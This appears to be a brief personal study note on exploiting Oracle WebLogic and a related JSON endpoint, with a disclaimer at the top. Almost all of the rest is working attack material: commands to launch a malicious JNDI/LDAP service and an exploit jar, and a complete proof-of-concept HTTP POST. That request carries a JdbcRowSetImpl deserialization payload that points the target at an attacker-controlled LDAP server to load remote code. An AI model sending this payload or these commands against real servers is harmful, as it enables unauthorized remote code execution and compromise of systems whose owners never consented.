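This article is only a personal study record. The techniques it covers are for learning and reference only and must not be used for any other purpose! Do not use the techniques mentioned in this article to attack any computer system illegally without authorization. The user alone is responsible for any direct or indirect consequences and losses caused by using the techniques provided here.
1. Start the WebLogic environment, using the Docker environment for CVE-2020-14882;
2. Run the command to start the malicious service: java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C xxx -A xxx;
3. Set up the listener, then start the attack: java -jar CVE_2021_2394.jar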
POC
POST /bic/ssoService/v1/applyCT HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://fofa.info/
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Te: trailers
Connection: close
Content-Type: application/json
Content-Length: 209

{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://xxx.xxx.xxx.xxx:1389/xxxxx","autoCommit":true},"hfe4zyyzldp":"="}